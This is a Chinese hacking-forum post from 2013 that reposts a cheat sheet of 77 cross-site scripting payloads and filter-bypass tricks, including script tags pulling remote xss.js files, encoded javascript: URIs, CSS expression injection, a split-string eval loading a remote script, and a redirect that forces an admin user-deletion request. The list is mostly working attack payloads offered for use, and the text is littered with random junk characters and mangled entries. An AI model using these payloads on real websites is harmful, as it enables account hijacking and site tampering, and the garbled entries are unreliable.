找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2793|回复: 0
打印 上一主题 下一主题

XSS攻击汇总

[复制链接]
跳转到指定楼层
楼主
发表于 2013-4-19 19:22:37 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。
- ^* B( {0 f8 |- z5 ?$ @7 w(1)普通的XSS JavaScript注入" i2 H; l6 X' ]
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
# ^' b' P# {/ f) S/ M(2)IMG标签XSS使用JavaScript命令2 D7 h& v2 p' z, A+ R) {9 `
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>! k# z- v+ Z; i1 \7 O
(3)IMG标签无分号无引号  U9 l" }: p) q$ x
<IMG SRC=javascript:alert(‘XSS’)>
5 T  U: n+ O0 O( f* a(4)IMG标签大小写不敏感3 B" U: |. d4 t  v; C  ~# n
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>: q, }8 [  z. `. y: G3 j' Y# P+ K
(5)HTML编码(必须有分号)2 U6 g/ @: ?) x( h, l7 v6 S7 @
<IMG SRC=javascript:alert(“XSS”)>0 t% ?. q& T3 i  l9 E
(6)修正缺陷IMG标签- W: T1 v9 T' @3 N
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
- R9 J, ]( I& f! _7 v  b" k6 y- t) B3 p8 ^  }9 v2 V2 |  g

, U( P  ^# B3 J) |(7)formCharCode标签(计算器)
+ f0 x/ w! W" h- T& G8 P* M<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>; Y; T' Q2 d8 Q! [5 f! ^4 ~
(8)UTF-8的Unicode编码(计算器)6 ~9 s4 p# e% f4 |6 v
<IMG SRC=jav..省略..S')>
8 C6 M3 z7 t+ i4 N/ Q) C, a% W(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
& X0 ], f5 |# @/ }; u<IMG SRC=jav..省略..S')>3 x0 i* L* c$ z# L* [4 J; G, f
(10)十六进制编码也是没有分号(计算器)3 ~$ r" b8 Q* e" `' ~- G
<IMG SRC=&#x6A&#x61&#x76&#x61..省略..&#x58&#x53&#x53&#x27&#x29>+ Q, j% Y, y3 ~/ M
(11)嵌入式标签,将Javascript分开
+ Y- d. t# E% ^( g3 U9 ~" z<IMG SRC=”jav ascript:alert(‘XSS’);”>) |; X) v5 L4 |1 c) b
(12)嵌入式编码标签,将Javascript分开$ B% J. p9 l2 G! i; ~, r
<IMG SRC=”jav ascript:alert(‘XSS’);”>/ g& M9 p3 f! ^1 \" _
(13)嵌入式换行符
7 m* E, Z( j2 n3 P6 y<IMG SRC=”jav ascript:alert(‘XSS’);”>$ O; p, _8 y& g9 ~
(14)嵌入式回车! z$ Z7 @8 s6 @4 E
<IMG SRC=”jav ascript:alert(‘XSS’);”>
  |+ \! Y/ W1 d# l& {' h3 k: F$ H(15)嵌入式多行注入JavaScript,这是XSS极端的例子5 @- I5 e6 C3 c$ i
<IMG SRC=”javascript:alert(‘XSS‘)”>
9 ~" m, P$ _$ A( q9 }, M9 n(16)解决限制字符(要求同页面)3 b; C1 v# u6 ^- r5 d
<script>z=’document.’</script>, \( m% S4 V# t- M/ P6 B) N
<script>z=z+’write(“‘</script>0 f* x* Y8 k$ H0 Q2 ~+ l
<script>z=z+’<script’</script>
9 n. C9 _% s" D! x8 B<script>z=z+’ src=ht’</script>6 E, ^+ M3 ~0 Y0 b3 x
<script>z=z+’tp://ww’</script>
; @' |7 e. U5 E7 i8 x<script>z=z+’w.shell’</script>+ |* S; x' w5 n2 {# N5 p
<script>z=z+’.net/1.’</script># l0 X3 J$ `% f9 t. m1 C
<script>z=z+’js></sc’</script>
* ~! M2 Y& W6 a<script>z=z+’ript>”)’</script>
3 F' v8 W/ O8 X, B, V/ z( C<script>eval_r(z)</script>
. T. U  J/ H' E5 e(17)空字符12-7-1 T00LS - Powered by Discuz! Board. f" \7 i# Z( |
https://www.t00ls.net/viewthread ... table&tid=15267 2/61 n9 Y3 {" m( }6 Q6 X. ^* X
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out& S3 S0 t- S8 `2 D: n. m7 G) Z
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用) W6 n: M$ o0 A$ C$ v8 r0 r! @
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
2 ~( l% L- n8 m1 N8 {(19)Spaces和meta前的IMG标签4 K- c9 V' C8 {6 C: H! `" u
<IMG SRC=” javascript:alert(‘XSS’);”>9 m& ^1 X1 W! o( ^" ^7 c
(20)Non-alpha-non-digit XSS) k2 p+ h' }9 g
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
6 T- i% z) \+ p6 d" z5 v9 v(21)Non-alpha-non-digit XSS to 2  F4 v; l+ p7 t% r& Q+ w  U
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>$ B6 {/ R/ V3 {  |8 t  U2 k
(22)Non-alpha-non-digit XSS to 3
2 Q5 J" x8 K' y! U+ l<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT># R$ a" g* M+ L- h) u
(23)双开括号9 g# ^; G+ L: V1 ~3 x
<<SCRIPT>alert(“XSS”);//<</SCRIPT>
+ b/ P! ^1 B6 \2 v3 _6 S(24)无结束脚本标记(仅火狐等浏览器)
. F+ U; k2 n6 \9 \- G/ }: R<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>* o0 P* U7 w6 S  g) P3 {, m( _7 H
(25)无结束脚本标记2# z" r+ V7 P3 r8 p. }3 f/ _
<SCRIPT SRC=//3w.org/XSS/xss.js>8 f0 ?4 Z1 @5 l+ s7 K
(26)半开的HTML/JavaScript XSS5 ~% Z$ C1 Q0 p* e. t
<IMG SRC=”javascript:alert(‘XSS’)”5 O. `: [! w4 r
(27)双开角括号' _2 k2 H0 I# `8 t
<iframe src=http://3w.org/XSS.html <
/ V) f, U9 y) w# y# R) Z2 M8 u(28)无单引号 双引号 分号
5 [7 ]4 ~5 k- z# A4 o( F4 H<SCRIPT>a=/XSS/
# E7 C5 k. L6 i5 L+ P! T# n0 T% _alert(a.source)</SCRIPT>$ n3 R; l' k  G5 _2 ~) Z9 ~& A
(29)换码过滤的JavaScript
( {+ a, N6 L9 p+ x. h9 Y1 g\”;alert(‘XSS’);//- `3 W5 K7 m1 c
(30)结束Title标签. j/ N& |$ c: Q% m: X
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>. j2 R  [0 ~) g- C; Z0 l" ]' K; p
(31)Input Image
- ~% R' {& P9 {8 e; T<INPUT SRC=”javascript:alert(‘XSS’);”>( L. k) e, ^6 Y
(32)BODY Image  r" \7 J6 B2 }& k, Q" v( Y, I
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>- f2 P' V9 b: |' P5 c
(33)BODY标签
& H% e! H2 @' w5 {  f<BODY(‘XSS’)>
& N& U" U3 U3 E. Y) `' h0 B(34)IMG Dynsrc& Q( B! x% [( ]* Q' v4 K
<IMG DYNSRC=”javascript:alert(‘XSS’)”>- N) N0 h" a$ |( C4 i9 H
(35)IMG Lowsrc0 J. X& H) {% i
<IMG LOWSRC=”javascript:alert(‘XSS’)”>2 j! b; p7 g5 U: h% D& r* I
(36)BGSOUND2 Y1 \! b9 J* J
<BGSOUND SRC=”javascript:alert(‘XSS’);”>' H; e% ]3 I9 o1 o
(37)STYLE sheet. Z" w1 @. W' o+ j% Q$ z% p9 c
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>& Q. o( e8 D& A  l" i: _8 d" M
(38)远程样式表$ }7 D/ Z" Y: R( k
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
0 C6 D/ w3 w6 _, ~9 G(39)List-style-image(列表式)( l4 x' A+ o9 j  f
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS' A, h. S! P- v
(40)IMG VBscript, X% W5 [9 B' o) D7 V
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS) S5 N+ _4 i* t/ F$ X4 _4 `
(41)META链接url$ u& ?7 A# e* B$ z- N9 b

8 Z, q9 C/ n' Y% [3 ^
1 u1 f- B" R( P% H3 O. D7 }<META HTTP-EQUIV=”refresh” CONTENT=”0;: g) }+ w9 s% a  t" G" K* K
URL=http://;URL=javascript:alert(‘XSS’);”>! i+ T6 N- o8 A- S% {5 e3 I2 H) J( j
(42)Iframe
% t" }8 z7 ?- \$ `<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
" k- l. J* Y( x2 \. }3 M% `(43)Frame
; e9 N) _* [1 W/ _2 A! L<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>12-7-1 T00LS - Powered by Discuz! Board
* t$ _) l# ^7 v! M, k0 @https://www.t00ls.net/viewthread ... table&tid=15267 3/6, b# ?6 E! [  |$ j' z- A
(44)Table
$ K# J; X. x* A: @: W+ K<TABLE BACKGROUND=”javascript:alert(‘XSS’)”># P5 g2 }4 W, H- S
(45)TD
6 e6 P2 \+ @. {% D# Y, y& B$ M" g<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
& g( V8 r1 [) B: |2 k(46)DIV background-image& _. U. f" w/ h5 l
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>' d: u; O5 m2 \" \1 C
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-; f# A' z  V' t( a, S8 {* M
8&13&12288&65279)
: F1 f  Y9 m' \1 i8 [' W4 |<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>' x2 |% e2 T8 l& Y& X* V/ y; W  q
(48)DIV expression
9 G) W( r- r. k4 J: {<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
1 ?6 G: Z5 x/ P) i6 Q0 y(49)STYLE属性分拆表达
9 d/ P5 X0 L5 s* h* I+ @<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
1 L! Z& T( {" Z( B+ v0 m5 k(50)匿名STYLE(组成:开角号和一个字母开头)2 o: j" s: q% E
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>. c% a! t' y/ f5 o$ q4 k
(51)STYLE background-image7 U0 F5 ]! y7 N, ~
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A, Q6 \! y* p+ ]9 a
CLASS=XSS></A>! I$ K" w, O0 ]' |. u
(52)IMG STYLE方式; Z* q2 F* d# K2 P* ]
exppression(alert(“XSS”))’>
; ]2 d" ^  A% {- N) K(53)STYLE background
  u. T$ m% p0 z<STYLE><STYLE5 O6 B$ S1 N; M1 m
type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
. j( e7 Z7 A) `$ {6 L+ t' B(54)BASE
. c# z7 _4 r7 ]5 v- X2 g<BASE HREF=”javascript:alert(‘XSS’);//”>0 a+ _. s% T1 f# }% Z* a6 s4 w
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
0 @6 j) ~8 W5 @) R# i; @<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>/ q! |" H/ ]3 D) t1 B
(56)在flash中使用ActionScrpt可以混进你XSS的代码: w" c, y6 |* y7 |2 `
a=”get”;, X5 P0 {% g* A( \; \9 F6 }" ^6 |
b=”URL(\”";" z0 b" X9 T$ O7 Z# U; m- `
c=”javascript:”;
1 g4 O  V% _5 rd=”alert(‘XSS’);\”)”;# U" j: g1 p' v3 F0 L2 X. e& F  ~
eval_r(a+b+c+d);
3 N* k5 y5 S) ^6 M(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上) u; r  N+ E+ n
<HTML xmlns:xss>8 o% n6 Q! N' s1 a# J
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
* U5 U! X% ~# o4 T/ J) S% T4 Y<xss:xss>XSS</xss:xss>
' L% p. n4 [, D' i/ s5 |</HTML>
8 C$ r  Q; w3 c6 V2 g9 [: e(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
# N$ h. D" l6 `5 e; a, g0 q2 a<SCRIPT SRC=””></SCRIPT>
1 f( B4 n6 p/ G) R5 K(59)IMG嵌入式命令,可执行任意命令, ^- T/ c* ^( u
<IMG SRC=”http://www.XXX.com/a.php?a=b”>
2 e9 x4 o/ e% |) c1 b* j; i2 I(60)IMG嵌入式命令(a.jpg在同服务器)
1 ]& L7 ~& x3 l% H& O3 LRedirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
5 h0 e# Y3 \! p+ G(61)绕符号过滤) ~# j6 @& \+ W0 f, i! d
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
( p% g3 n/ v7 O/ p(62)
2 F% D3 J+ F0 E9 w; U" R<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>/ u) [) M9 e! z; p, \$ e
(63)
1 I) ^$ J5 y% G& @<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
: s( J% D2 S3 Y; o. }# L(64)
8 p4 Q6 _# u6 m<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
7 H, Q: v9 b  c& u! `  M: Z* _$ M( `(65)
) [" d3 F8 P8 B<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
. }# X  c5 ]1 F; x, d2 c(66)12-7-1 T00LS - Powered by Discuz! Board6 O/ m3 p8 d+ N. ~
https://www.t00ls.net/viewthread ... table&tid=15267 4/6
; d( t1 V4 f2 ?; H' b+ `<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>* N, v$ B$ M0 e8 Z8 p
(67)1 b: v2 a" T. L0 L
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”>
4 i0 x# G8 K. D</SCRIPT>
3 G- W+ q( c/ t# v/ c(68)URL绕行1 L- P6 }6 \; B7 ~
<A HREF=”http://127.0.0.1/”>XSS</A>
4 p; Y' U% L& B8 m& R, r: {2 F8 M(69)URL编码4 B) }' q/ }. }; h7 w+ U; h/ N
<A HREF=”http://3w.org”>XSS</A>
* A$ ^" n" N& D* X" N3 u(70)IP十进制
9 `/ O+ c+ U& g( L6 ^<A HREF=”http://3232235521″>XSS</A>0 v& f& \& f$ ]& T
(71)IP十六进制
! ?) _4 J) ~7 g  b- J<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
$ H9 I$ [% I/ ^% x# P  Y, m* z( |(72)IP八进制$ s3 d  `- |& `; H- p, n( ^- T
<A HREF=”http://0300.0250.0000.0001″>XSS</A>
' R: {9 ?4 h5 D0 S(73)混合编码: @$ Y7 m+ s; l8 j9 \- d2 J2 ]8 ]
<A HREF=”h
) h, Z, s! K$ |: B, Dtt p://6 6.000146.0×7.147/”">XSS</A>
) E; H5 G( Q+ a1 H1 Y! p(74)节省[http:]/ l+ P) u8 |& i' U2 K
<A HREF=”//www.google.com/”>XSS</A>
5 s* M9 U9 o$ r3 P! k(75)节省[www]
) ^) }" f1 p2 T1 X( |<A HREF=”http://google.com/”>XSS</A>5 _8 P& }# A4 Y3 x4 m: D2 O/ I
(76)绝对点绝对DNS' G# ]3 O2 ]0 q" d, s' p
<A HREF=”http://www.google.com./”>XSS</A>
* N  ?4 i: T9 g5 C% I+ C0 C(77)javascript链接# M; h% D- |- _& s. G6 b
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>; g1 X& i& N6 i" K" H

6 r4 ^& Y7 B; Y& S0 m原文地址:http://fuzzexp.org/u/0day/?p=14
* B1 @  Q* i/ V
% D0 {3 D8 x& T* D  d* `: `  T) d
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表